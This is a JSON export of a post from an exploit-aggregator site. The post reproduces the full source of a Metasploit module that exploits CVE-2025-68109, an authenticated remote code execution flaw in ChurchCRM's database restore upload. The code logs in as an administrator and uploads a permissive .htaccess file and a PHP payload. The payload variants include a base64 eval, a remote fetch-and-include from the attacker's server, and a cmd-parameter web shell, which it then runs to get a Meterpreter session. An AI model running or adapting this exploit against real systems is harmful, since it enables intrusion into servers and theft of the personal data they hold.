{"id":47503,"date":"2026-04-16T14:43:41","date_gmt":"2026-04-16T14:43:41","guid":{"rendered":"http:\/\/localhost\/?p=47503"},"modified":"2026-04-16T14:43:41","modified_gmt":"2026-04-16T14:43:41","slug":"churchcrm-database-restore-rce-620","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=47503","title":{"rendered":"ChurchCRM Database Restore RCE 6.2.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-16T19:28:02&#8243;,&#8221;description&#8221;:&#8221;This module exploits a Remote Code Execution RCE vulnerability in ChurchCRM versions prior to 6.2.0. The vulnerability resides in the Database Restore functionality, which allows an authenticated user with administrative privileges to upload a&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-16T19:02:12&#8243;,&#8221;modified&#8221;:&#8221;2026-04-16T19:02:12&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;ChurchCRM Database Restore RCE 6.2.0&#8243;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-68109&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n  Rank = NormalRanking\\n\\n  include Msf::Exploit::Remote::HttpClient\\n  include Msf::Exploit::CmdStager\\n  include Msf::Exploit::Remote::HttpServer\\n  include Msf::Exploit::FileDropper\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;ChurchCRM Database Restore RCE 6.2.0&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits a Remote Code Execution (RCE) vulnerability in ChurchCRM\\n          versions prior to 6.2.0. The vulnerability resides in the Database Restore\\n          functionality, which allows an authenticated user with administrative privileges\\n          to upload a malicious backup file. By bypassing upload restrictions via a\\n          crafted .htaccess file, the module enables PHP code execution in the target\\n          directory, ultimately providing the attacker with a Meterpreter shell.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [&#8216;LucasCsmt&#8217;],\\n        &#8216;References&#8217; =\\u003e [\\n          [ &#8216;GHSA&#8217;, &#8216;pqm7-g8px-9r77&#8217;],\\n          [ &#8216;CVE&#8217;, &#8216;2025-68109&#8217;]\\n        ],\\n        &#8216;Platform&#8217; =\\u003e [&#8216;linux&#8217;, &#8216;php&#8217;],\\n        &#8216;Targets&#8217; =\\u003e [\\n          [\\n            &#8216;Linux\/unix Command (CmdStager)&#8217;,\\n            {\\n              &#8216;Arch&#8217; =\\u003e [ ARCH_X86, ARCH_X64 ],\\n              &#8216;Platform&#8217; =\\u003e [&#8216;linux&#8217;],\\n              &#8216;Type&#8217; =\\u003e :nix_cmdstager,\\n              &#8216;CmdStagerFlavor&#8217; =\\u003e [\\n                &#8216;printf&#8217;, &#8216;echo&#8217;, &#8216;bourne&#8217;, &#8216;fetch&#8217;, &#8216;curl&#8217;, &#8216;wget&#8217;\\n              ]\\n            }\\n          ],\\n          [\\n            &#8216;PHP (In-Memory)&#8217;,\\n            {\\n              &#8216;Arch&#8217; =\\u003e [ ARCH_PHP ],\\n              &#8216;Platform&#8217; =\\u003e [&#8216;php&#8217;],\\n              &#8216;Type&#8217; =\\u003e :php_memory\\n            }\\n          ],\\n          [\\n            &#8216;PHP (Fetch)&#8217;,\\n            {\\n              &#8216;Arch&#8217; =\\u003e [ ARCH_PHP ],\\n              &#8216;Platform&#8217; =\\u003e [&#8216;php&#8217;],\\n              &#8216;Type&#8217; =\\u003e :php_fetch\\n            }\\n          ],\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-12-17&#8217;,\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS, CONFIG_CHANGES]\\n        }\\n      )\\n    )\\n\\n    register_options(\\n      [\\n        OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path&#8217;, &#8216;\/&#8217;]),\\n        OptString.new(&#8216;USERNAME&#8217;, [true, &#8216;Username for the admin account&#8217;, &#8216;admin&#8217;]),\\n        OptString.new(&#8216;PASSWORD&#8217;, [true, &#8216;Password for the admin account&#8217;, nil])\\n      ]\\n    )\\n  end\\n\\n  # Check if the target is up by accessing the login page\\n  def check\\n    vprint_status(&#8216;Checking if the target is reachable&#8230;&#8217;)\\n\\n    res = send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;session&#8217;, &#8216;begin&#8217;)\\n    })\\n\\n    unless [200, 301, 302].include?(res.code)\\n      return Exploit::CheckCode::Unknown(\\&#8221;Unexpected HTTP response code: #{res.code}\\&#8221;)\\n    end\\n\\n    version = res.headers[&#8216;CRM-VERSION&#8217;]\\n    if version\\n      print_status(\\&#8221;Found ChurchCRM version: #{version}\\&#8221;)\\n      if Rex::Version.new(version) \\u003c Rex::Version.new(&#8216;6.5.3&#8217;)\\n        return Exploit::CheckCode::Appears(\\&#8221;Vulnerable version #{version} detected via CRM-VERSION header.\\&#8221;)\\n      else\\n        return Exploit::CheckCode::Safe(\\&#8221;Version #{version} is not vulnerable.\\&#8221;)\\n      end\\n    end\\n    if res.body.include?(&#8216;ChurchCRM&#8217;)\\n      return Exploit::CheckCode::Detected(&#8216;ChurchCRM detected, but the version could not be determined.&#8217;)\\n    end\\n\\n    Exploit::CheckCode::Safe(&#8216;The target does not appear to be ChurchCRM.&#8217;)\\n  end\\n\\n  # Build the payload that will be into the installation form\\n  #\\n  # @return : the payload\\n  def build_payload\\n    case target[&#8216;Type&#8217;]\\n    when :php_memory\\n      b64_payload = Rex::Text.encode_base64(payload.encoded)\\n      \\&#8221;\\u003c?php eval(base64_decode(\\\\\\&#8221;#{b64_payload}\\\\\\&#8221;)); ?\\u003e\\&#8221;\\n    when :php_fetch\\n      payload_name = &#8216;\/tmp\/&#8217; + rand_text_alpha(5..10) + &#8216;.php&#8217;\\n      \\&#8221;\\u003c?php $f=&#8217;#{payload_name}&#8217;; file_put_contents($f, file_get_contents(&#8216;#{get_uri}&#8217;)); register_shutdown_function(&#8216;unlink&#8217;, $f); include($f); ?\\u003e\\&#8221;\\n    else\\n      \\&#8221;\\u003c?php if(isset($_GET[&#8216;cmd&#8217;])){system($_GET[&#8216;cmd&#8217;].&#8217; 2\\u003e\\u00261&#8242;);} ?\\u003e\\&#8221;\\n    end\\n  end\\n\\n  # Get the session cookie of the specified user\\n  #\\n  # @return : the session cookie\\n  def get_cookie\\n    print_status &#8216;Getting the session cookie&#8217;\\n    res = send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;session&#8217;, &#8216;begin&#8217;),\\n      &#8216;vars_post&#8217; =\\u003e {\\n        &#8216;User&#8217; =\\u003e datastore[&#8216;USERNAME&#8217;],\\n        &#8216;Password&#8217; =\\u003e datastore[&#8216;PASSWORD&#8217;]\\n      }\\n    })\\n\\n    fail_with(Failure::Unreachable, &#8216;No answer from the server&#8217;) unless res\\n    fail_with(Failure::NoAccess, &#8216;Authentication error : Invalid login or password&#8217;) if res.body.include?(&#8216;Invalid login or password&#8217;)\\n    fail_with(Failure::NoAccess, &#8216;Authentication error : This account have been locked&#8217;) if res.body.include?(&#8216;Too many failed logins&#8217;)\\n    fail_with(Failure::UnexpectedReply, \\&#8221;Invalid status code : #{res.code}\\&#8221;) unless [200, 301, 302].include?(res.code)\\n\\n    cookie = res.get_cookies\\n    fail_with(Failure::UnexpectedReply, &#8216;No cookies found&#8217;) if cookie.blank?\\n\\n    print_good &#8216;The session cookie has been received&#8217;\\n    cookie\\n  end\\n\\n  # Handles the incoming HTTP request and serves the payload to the target.\\n  def on_request_uri(cli, _request)\\n    p = payload.encoded\\n    send_response(cli, p, {\\n      &#8216;Content-Type&#8217; =\\u003e &#8216;application\/x-httpd-php&#8217;,\\n      &#8216;Pragma&#8217; =\\u003e &#8216;no-cache&#8217;\\n    })\\n  end\\n\\n  def execute_command(cmd, _opts = {})\\n    send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;tmp_attach&#8217;, &#8216;ChurchCRMBackups&#8217;, @payload_name),\\n      &#8216;vars_get&#8217; =\\u003e { &#8216;cmd&#8217; =\\u003e cmd }\\n    })\\n  end\\n\\n  # Upload a file exploiting the database resotre functionality\\n  #\\n  # @param : file_name, the name of the file to upload\\n  # @param : content, the content of the file to upload\\n  def upload_file(file_name, content)\\n    print_status \\&#8221;Uploading the file : #{file_name}\\&#8221;\\n    data = Rex::MIME::Message.new\\n    data.add_part(\\n      content,\\n      &#8216;application\/octet-stream&#8217;,\\n      nil,\\n      \\&#8221;form-data; name=\\\\\\&#8221;restoreFile\\\\\\&#8221;; filename=\\\\\\&#8221;#{file_name}\\\\\\&#8221;\\&#8221;\\n    )\\n    data.add_part(&#8221;, nil, nil, &#8216;form-data; name=\\&#8221;restorePassword\\&#8221;&#8216;)\\n\\n    res = send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;api&#8217;, &#8216;database&#8217;, &#8216;restore&#8217;),\\n      &#8216;ctype&#8217; =\\u003e \\&#8221;multipart\/form-data; boundary=#{data.bound}\\&#8221;,\\n      &#8216;data&#8217; =\\u003e data.to_s,\\n      &#8216;cookie&#8217; =\\u003e @cookie\\n    })\\n    fail_with(Failure::Unreachable, &#8216;No answer from the server&#8217;) unless res\\n    # The server returns a 500 error because the uploaded file is not a valid backup file, but the file is still uploaded before the crash.\\n    fail_with(Failure::NotVulnerable, &#8216;Invalid status code, the target may not be vulnerable&#8217;) unless res.code == 500\\n    print_good &#8216;The file have been uploaded successfully&#8217;\\n  end\\n\\n  # Execute the payload\\n  def execute_payload\\n    print_status &#8216;Trying to execute the payload&#8217;\\n    if target[&#8216;Type&#8217;] == :nix_cmdstager\\n      execute_cmdstager(\\n        linemax: 500,\\n        nodelete: false,\\n        background: true,\\n        temp: &#8216;\/tmp&#8217;\\n      )\\n    else\\n      send_request_cgi({\\n        &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n        &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;tmp_attach&#8217;, &#8216;ChurchCRMBackups&#8217;, @payload_name)\\n      })\\n    end\\n    print_good &#8216;Payload successfully executed&#8217;\\n  end\\n\\n  def exploit\\n    if target[&#8216;Type&#8217;] == :php_fetch\\n      print_status(&#8216;Starting HTTP server to serve the payload&#8230;&#8217;)\\n      start_service\\n    end\\n\\n    @cookie = get_cookie\\n\\n    upload_file &#8216;.htaccess&#8217;, \\&#8221;Allow from all\\\\n\\&#8221;\\n    register_file_for_cleanup(&#8216;.htaccess&#8217;)\\n\\n    @payload_name = rand_text_alpha(5..10) + &#8216;.php&#8217;\\n    upload_file @payload_name, build_payload\\n    register_file_for_cleanup(@payload_name)\\n\\n    execute_payload\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/churchcrm_db_restore_rce.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.1,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/churchcrm_db_restore_rce\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-16T19:28:02&#8243;,&#8221;description&#8221;:&#8221;This module exploits a Remote Code Execution RCE vulnerability in ChurchCRM versions prior to 6.2.0. The vulnerability resides in the Database Restore functionality, which allows&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,169,13,7,11,5],"class_list":["post-47503","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>ChurchCRM Database Restore RCE 6.2.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=47503\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"ChurchCRM Database Restore RCE 6.2.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-16T19:28:02&#8243;,&#8221;description&#8221;:&#8221;This module exploits a Remote Code Execution RCE vulnerability in ChurchCRM versions prior to 6.2.0. The vulnerability resides in the Database Restore functionality, which allows...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=47503\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-16T14:43:41+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47503#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47503\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"ChurchCRM Database Restore RCE 6.2.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE-\",\"datePublished\":\"2026-04-16T14:43:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47503\"},\"wordCount\":1383,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.1\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47503#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47503\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47503\",\"name\":\"ChurchCRM Database Restore RCE 6.2.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-16T14:43:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47503#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47503\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47503#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"ChurchCRM Database Restore RCE 6.2.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"ChurchCRM Database Restore RCE 6.2.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=47503","og_locale":"en_US","og_type":"article","og_title":"ChurchCRM Database Restore RCE 6.2.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-16T19:28:02&#8243;,&#8221;description&#8221;:&#8221;This module exploits a Remote Code Execution RCE vulnerability in ChurchCRM versions prior to 6.2.0. The vulnerability resides in the Database Restore functionality, which allows...","og_url":"https:\/\/zero.redgem.net\/?p=47503","og_site_name":"zero redgem","article_published_time":"2026-04-16T14:43:41+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=47503#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=47503"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"ChurchCRM Database Restore RCE 6.2.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE-","datePublished":"2026-04-16T14:43:41+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=47503"},"wordCount":1383,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.1","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=47503#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=47503","url":"https:\/\/zero.redgem.net\/?p=47503","name":"ChurchCRM Database Restore RCE 6.2.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-16T14:43:41+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=47503#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=47503"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=47503#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"ChurchCRM Database Restore RCE 6.2.0_MSF:EXPLOIT-MULTI-HTTP-CHURCHCRM_DB_RESTORE_RCE-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47503","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=47503"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47503\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=47503"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=47503"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=47503"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}